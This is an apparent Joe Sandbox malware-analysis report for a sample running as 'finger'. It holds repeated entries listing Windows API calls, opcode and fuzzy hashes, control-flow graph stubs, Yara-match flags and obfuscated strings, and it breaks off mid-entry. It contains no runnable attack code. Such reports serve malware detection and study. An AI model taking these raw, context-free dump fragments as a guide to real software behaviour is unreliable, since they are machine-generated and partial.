                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 66a6f88af72d4e365fa4d9bd2ca2c5d7c34c5f2e02d8446cbf18e0e179952a5e
                                                                                                                                      • Instruction ID: 17d61b62a8ebc59dea9e727624db1e6c16610a73c418a0bd5b1efc416a721cc2
                                                                                                                                      • Opcode Fuzzy Hash: 66a6f88af72d4e365fa4d9bd2ca2c5d7c34c5f2e02d8446cbf18e0e179952a5e
                                                                                                                                      • Instruction Fuzzy Hash: B3110A72D0115C7AEB11D7A45C82EEF7B7CDF817A4F448064FA04B7142D6385D0687B1

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 483 9b1167-9b116b 484 9b116d-9b11da call 9cba70 call 9cc480 call 9b4920 call 9a1410 call 9c2060 483->484 485 9b11e1-9b11eb PostThreadMessageW 483->485 486 9b11fa-9b1200 484->486 501 9b11dc-9b11e0 484->501 485->486 487 9b11ed-9b11f7 485->487 487->486 501->485
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 009B11E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: 54435d0cc237de49655d9c7772ba73c378d7288e6792c91baacb45b8710684f0
                                                                                                                                      • Instruction ID: a5c5301ab585e604b5fe7716f99e33939a5949ab8898eff3432bd1216da7e455
                                                                                                                                      • Opcode Fuzzy Hash: 54435d0cc237de49655d9c7772ba73c378d7288e6792c91baacb45b8710684f0
                                                                                                                                      • Instruction Fuzzy Hash: 8A11E5B2D0514C7AEB11ABE48C91EEF7B7CDF817A4F048068FA04B7101E5385E068BB1

                                                                                                                                      Control-flow Graph

                                                                                                                                      control_flow_graph 502 9b1170-9b11da call 9cba70 call 9cc480 call 9b4920 call 9a1410 call 9c2060 514 9b11fa-9b1200 502->514 515 9b11dc-9b11eb PostThreadMessageW 502->515 515->514 517 9b11ed-9b11f7 515->517 517->514
                                                                                                                                      APIs
                                                                                                                                      • PostThreadMessageW.USER32(3G9s16YI,00000111,00000000,00000000), ref: 009B11E7
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                      • String ID: 3G9s16YI$3G9s16YI
                                                                                                                                      • API String ID: 1836367815-3632291559
                                                                                                                                      • Opcode ID: b56bf9a4d39a1b653076afe1226ab24f033de7dd1a5767a26046ecfe28280db8
                                                                                                                                      • Instruction ID: fa812ea5ed8f00ff8cb6ab233fa3376d2e2cd985f95b3f3aa6131acc92018133
                                                                                                                                      • Opcode Fuzzy Hash: b56bf9a4d39a1b653076afe1226ab24f033de7dd1a5767a26046ecfe28280db8
                                                                                                                                      • Instruction Fuzzy Hash: 4101C4B2D0110C7AEB10ABE48C82EEF7B7CDF817A4F008069FA04B7141D6385E068BB1
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                                      • String ID: @J7<
                                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                                      • Opcode ID: 9c2d70e9b7b165ad7369f29b5d7c6250e8d559375a5adedd44e5b5ab186539fa
                                                                                                                                      • Instruction ID: f009344012016816311ca64310501f9f547b5339fc76e78813112ff1e9f8596f
                                                                                                                                      • Opcode Fuzzy Hash: 9c2d70e9b7b165ad7369f29b5d7c6250e8d559375a5adedd44e5b5ab186539fa
                                                                                                                                      • Instruction Fuzzy Hash: 4D416476A002099FDB10DFD8DC819EEB7B9FF88314F108569E509EB214D771ED458BA0
                                                                                                                                      APIs
                                                                                                                                      • Sleep.KERNELBASE(000007D0), ref: 009C3F8B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Sleep
                                                                                                                                      • String ID: net.dll$wininet.dll
                                                                                                                                      • API String ID: 3472027048-1269752229
                                                                                                                                      • Opcode ID: 03d75427debc5d609b2eb6f7188f91b452b235da142fc21f9c8642c28b308a00
                                                                                                                                      • Instruction ID: 1d4693cd3e57aee72d9740be5a76539b8b751fe4254af6384a195db48db91191
                                                                                                                                      • Opcode Fuzzy Hash: 03d75427debc5d609b2eb6f7188f91b452b235da142fc21f9c8642c28b308a00
                                                                                                                                      • Instruction Fuzzy Hash: 5F3170B1A01605BBD714DFA4CC81FEBBBB9EB88714F40851DF6196B241D774AA40CBA2
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeUninitialize
                                                                                                                                      • String ID: @J7<
                                                                                                                                      • API String ID: 3442037557-2016760708
                                                                                                                                      • Opcode ID: c8137104908ac9fc80c98f012a38db75d1e2c20981718af9eb5877e168ab6c8e
                                                                                                                                      • Instruction ID: 2b6b78dd6d7b6777ea19f8dc30caf4108c42a7e73f19bb9723386e6ddbabd8d2
                                                                                                                                      • Opcode Fuzzy Hash: c8137104908ac9fc80c98f012a38db75d1e2c20981718af9eb5877e168ab6c8e
                                                                                                                                      • Instruction Fuzzy Hash: 03311EB6A0060AAFDB00DFD8DC809EEB7B9BF88314F108559E515AB214D775AE458BA0
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009B4992
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 88a25ceaf533c559e86a30bd475ebb1ba8dffb6508b14e3f06e286eddad8c3ba
                                                                                                                                      • Instruction ID: 74972c196215803506d32bf2570103e1cb4aa0f8ffa290a1a75e88d06f2111e3
                                                                                                                                      • Opcode Fuzzy Hash: 88a25ceaf533c559e86a30bd475ebb1ba8dffb6508b14e3f06e286eddad8c3ba
                                                                                                                                      • Instruction Fuzzy Hash: 42213675D0420EABDF20EB94ED41FFEB7799F51728F040199E8589B243F6329A18C791
                                                                                                                                      APIs
                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 009B4992
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Load
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                      • Opcode ID: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                      • Instruction ID: e269df9d7bd88fa7922f109ae47fdb112695f7a783a661ed3c49f54e9a45aa7a
                                                                                                                                      • Opcode Fuzzy Hash: 9d75b0684c7b2c85136cce4d19a8f736d81c15d4d2bc0a663619e57a58b04cfb
                                                                                                                                      • Instruction Fuzzy Hash: BD011EB5D0020DABDF10DAE4DD52FDEB7789B54708F0041A9F91897281F631EB19DB92
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessInternalW.KERNELBASE(?,?,00000000,?,009B870E,00000010,?,?,?,00000044,?,00000010,009B870E,?,00000000,?), ref: 009C9D60
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateInternalProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2186235152-0
                                                                                                                                      • Opcode ID: 6644b415bad7e376847d335840e632c13dbe43a7532c77a696d293187108979b
                                                                                                                                      • Instruction ID: c5213bdbd081837eba641f77cfe1b21df64b95263e0cbdc44eb1d236d248c514
                                                                                                                                      • Opcode Fuzzy Hash: 6644b415bad7e376847d335840e632c13dbe43a7532c77a696d293187108979b
                                                                                                                                      • Instruction Fuzzy Hash: E601C0B2200108BFCB04DF89DC81EEB77ADEF8C714F408208BA09E3241D630F8518BA4
                                                                                                                                      APIs
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009A9E25
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: e632c74228effe3e41c31b354731c6cee34354bdfa25a2039bb9058f3e46be74
                                                                                                                                      • Instruction ID: 7d3f3959082d8fc5632c4f3559cf2d8ce0e8f3609e9f05fb1a129c4646189148
                                                                                                                                      • Opcode Fuzzy Hash: e632c74228effe3e41c31b354731c6cee34354bdfa25a2039bb9058f3e46be74
                                                                                                                                      • Instruction Fuzzy Hash: FFF0657338031436D63066E9DC02FD7779CDBC5B61F14006AF60CEB1C1D992B40146E5
                                                                                                                                      APIs
                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 009A9E25
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2422867632-0
                                                                                                                                      • Opcode ID: 3cba06b489093297e44dff315d1292046129d3ee91c62e4a20678e75f196146f
                                                                                                                                      • Instruction ID: c7864400c3ea1d60f9ff479fae7083cf5a6cd2be9425982fead1a19fc693f493
                                                                                                                                      • Opcode Fuzzy Hash: 3cba06b489093297e44dff315d1292046129d3ee91c62e4a20678e75f196146f
                                                                                                                                      • Instruction Fuzzy Hash: B2F092B668070036E231A7A8DC03F976A9D8BC5B11F14006AF708AB1C1D9A6B40087A9
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(009B1DE9,?,009C5BF3,009B1DE9,009C5AAF,009C5BF3,?,009B1DE9,009C5AAF,00001000,?,?,00000000), ref: 009C9C5C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: bb4ff64b5881db452091132d672183da247ee8d903e57c73fca0792ed643da86
                                                                                                                                      • Instruction ID: 26e42e0364de041b259438e3decc530a490374473c52b7a5606b86fad9181068
                                                                                                                                      • Opcode Fuzzy Hash: bb4ff64b5881db452091132d672183da247ee8d903e57c73fca0792ed643da86
                                                                                                                                      • Instruction Fuzzy Hash: 92E06D716003087FC614EE59DC81F9B77ADEFC9714F004408F908A7241D731B8108BB9
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000004,00000000,348F3D41,00000007,00000000,00000004,00000000,009B4185,000000F4), ref: 009C9CAC
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                      • Opcode ID: 8cb8b7e952e22caa2dfb467c6a9fff9777dc7d5e733903d0db063a4f97bcd6c7
                                                                                                                                      • Instruction ID: bd5bff32766c4f5c01ccbaa12dfc2a19d1b7950440706a34dba653e742833532
                                                                                                                                      • Opcode Fuzzy Hash: 8cb8b7e952e22caa2dfb467c6a9fff9777dc7d5e733903d0db063a4f97bcd6c7
                                                                                                                                      • Instruction Fuzzy Hash: 5EE09AB23002087FD614EE5ADC42FAB77ADEFCA710F004008F908A7281D630BC108BBA
                                                                                                                                      APIs
                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 009B877C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AttributesFile
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                      • Opcode ID: 160c0f478dbb599c20a58c53704a0c371b5c0b0fa73cb7f23227027037c55759
                                                                                                                                      • Instruction ID: 9e362bbf0837d4041ac7e25630dfb3be6e79e482abf77355ada0fbe245083bc2
                                                                                                                                      • Opcode Fuzzy Hash: 160c0f478dbb599c20a58c53704a0c371b5c0b0fa73cb7f23227027037c55759
                                                                                                                                      • Instruction Fuzzy Hash: D9E0807624030417EB246669DD85FA7335C574C734F1C4561B91CDB5C2DE74F902C550
                                                                                                                                      APIs
                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,009B20E0,009C83EF,009C5AAF,009B20B0), ref: 009B8573
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorMode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                      • Opcode ID: 8baa53329ec217cb7499463543f5916ee93653386981487b4d276d87569bd488
                                                                                                                                      • Instruction ID: 3f6804aa40ebc2fcdcac16c9032aa9e20dc5a9050aa9be43c3df726de0b5c8df
                                                                                                                                      • Opcode Fuzzy Hash: 8baa53329ec217cb7499463543f5916ee93653386981487b4d276d87569bd488
                                                                                                                                      • Instruction Fuzzy Hash: 91E0C2757C42053EEB10E6B49C03F5B2A884B94340F044079B809E76C3DCA0E1008A91
                                                                                                                                      APIs
                                                                                                                                      • SetErrorMode.KERNELBASE(00008003,?,?,009B20E0,009C83EF,009C5AAF,009B20B0), ref: 009B8573
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3586429800.00000000009A0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009A0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_9a0000_finger.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorMode
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2340568224-0
                                                                                                                                      • Opcode ID: ec561b8a8f83b8c0cfb3fd323729bff6cdd967d7f4fe86c04794773a90c7fb8d
                                                                                                                                      • Instruction ID: 5d79a3192e90695d0a3365ed45a339387a2863edef88f791cecebc0e6a53741f
                                                                                                                                      • Opcode Fuzzy Hash: ec561b8a8f83b8c0cfb3fd323729bff6cdd967d7f4fe86c04794773a90c7fb8d
                                                                                                                                      • Instruction Fuzzy Hash: AED05E757843053BEA10E6A89C03F573A8C5B88750F048075BD08E76C3ECA5F51086A6
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                      • Opcode ID: 311059229d700bd8ad4c4aeb40acfa1ac9d1c0620ee37dd16d2683d2d56fb0d3
                                                                                                                                      • Instruction ID: b299f3f0a05c1dc251b58ae3ffb50e513aad17bf1ddb25c82808f8925bca0218
                                                                                                                                      • Opcode Fuzzy Hash: 311059229d700bd8ad4c4aeb40acfa1ac9d1c0620ee37dd16d2683d2d56fb0d3
                                                                                                                                      • Instruction Fuzzy Hash: F2B02B319014C4C5DA00E32016087073E0077C1300F1DC061E2030243E0738C0C0F171
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587836704.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_32e0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8181c8654b4778ca22122711ea1bc35289885c20878a786c2ab7680ee0d1e002
                                                                                                                                      • Instruction ID: fd6dd4e9c09d234433b63ee7bf6c621993847ec93b072550542dec2ad24d0948
                                                                                                                                      • Opcode Fuzzy Hash: 8181c8654b4778ca22122711ea1bc35289885c20878a786c2ab7680ee0d1e002
                                                                                                                                      • Instruction Fuzzy Hash: F5410870528F0D4FC768EF699082676F3E1FB89300F90452DC99AC7252E7B0E4878785
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587836704.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_32e0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                      • API String ID: 0-3754132690
                                                                                                                                      • Opcode ID: 0486a1a3788a22a9200b2b7c6af9070ef4023c6ef910aabddfe15e112bfe65e9
                                                                                                                                      • Instruction ID: 269e6c0709ece6eaf1c89e0be3b5e2ff07fcbe3537350555b05812069bce1ed5
                                                                                                                                      • Opcode Fuzzy Hash: 0486a1a3788a22a9200b2b7c6af9070ef4023c6ef910aabddfe15e112bfe65e9
                                                                                                                                      • Instruction Fuzzy Hash: DC9160F04182988AC7158F54A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                      • Opcode ID: 5a85fdece5e8dc4ec91c17620d39f7b4f417034dc68f4a930874bfeaced54f57
                                                                                                                                      • Instruction ID: 2fd58ba7a10632511feabf7e6773d76f9e8db42a4916852a4ef8a1c5471bd6fc
                                                                                                                                      • Opcode Fuzzy Hash: 5a85fdece5e8dc4ec91c17620d39f7b4f417034dc68f4a930874bfeaced54f57
                                                                                                                                      • Instruction Fuzzy Hash: 92512179A00216BFCF51DF58D89097EFBB8BB46200B54866AF455D7691D334DE40C7E0
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___swprintf_l
                                                                                                                                      • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                      • API String ID: 48624451-2108815105
                                                                                                                                      • Opcode ID: dfa5bd62e35c1287bf254e04866ff19e7fcb7d053f37c69bbc7d6103a5a25836
                                                                                                                                      • Instruction ID: 0d9cddb4efeda384983d05dd93f81e078f872b73379e68183410ccde2428d3ed
                                                                                                                                      • Opcode Fuzzy Hash: dfa5bd62e35c1287bf254e04866ff19e7fcb7d053f37c69bbc7d6103a5a25836
                                                                                                                                      • Instruction Fuzzy Hash: FE51E575A00649BEEF20DE9DD89097EB7F9BF44200F048C5BE49ACB691E774DA008760
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587836704.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_32e0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #>&"$$)jq$$8=5$4#~c$4~be$70#8$9#><$:>xq$=8:4$==0~$>38=$>85q$~dbf$~dbf
                                                                                                                                      • API String ID: 0-3936019208
                                                                                                                                      • Opcode ID: 23477238abfb53dc3cc93e125f478709c3c5955643ce59dd4c39dbf6c6f46513
                                                                                                                                      • Instruction ID: e2eb67487b8536c0041762cfed97be74705cc4d24714689c4517b3cadcb1564b
                                                                                                                                      • Opcode Fuzzy Hash: 23477238abfb53dc3cc93e125f478709c3c5955643ce59dd4c39dbf6c6f46513
                                                                                                                                      • Instruction Fuzzy Hash: 814103B491438CDFCF24DF85D5416EEBBB1FF04344F804059E8096F258C2B58AA6CB89
                                                                                                                                      Strings
                                                                                                                                      • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03554725
                                                                                                                                      • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03554655
                                                                                                                                      • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03554742
                                                                                                                                      • ExecuteOptions, xrefs: 035546A0
                                                                                                                                      • Execute=1, xrefs: 03554713
                                                                                                                                      • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 035546FC
                                                                                                                                      • CLIENT(ntdll): Processing section info %ws..., xrefs: 03554787
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                      • API String ID: 0-484625025
                                                                                                                                      • Opcode ID: 98ac2cf0b563711259cda9316802516dd8ac2560cea27ea32015820295eeb9a6
                                                                                                                                      • Instruction ID: b066823996120512db3530a4a9d0861540120303be6d790c1cd65ef8e4338d4b
                                                                                                                                      • Opcode Fuzzy Hash: 98ac2cf0b563711259cda9316802516dd8ac2560cea27ea32015820295eeb9a6
                                                                                                                                      • Instruction Fuzzy Hash: E9514935A103197AEF10EBA9FC95FAD77B8BF48300F14049AE505AB1B1E770AA558F90
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000A.00000002.3587993008.00000000034B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034B0000, based on PE: true
• Associated: 0000000A.00000002.3587993008.00000000035D9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.00000000035DD000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3587993008.000000000364E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_10_2_34b0000_finger.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __aulldvrm
                                                                                                                                      • String ID: +$-$0$0
                                                                                                                                      • API String ID: 1302938615-699404926
                                                                                                                                      • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                                                      • Instruction ID: fc7465d6cf0d22cfd61f8aeadd9a81d064de9439d9053c5505b876106532553a
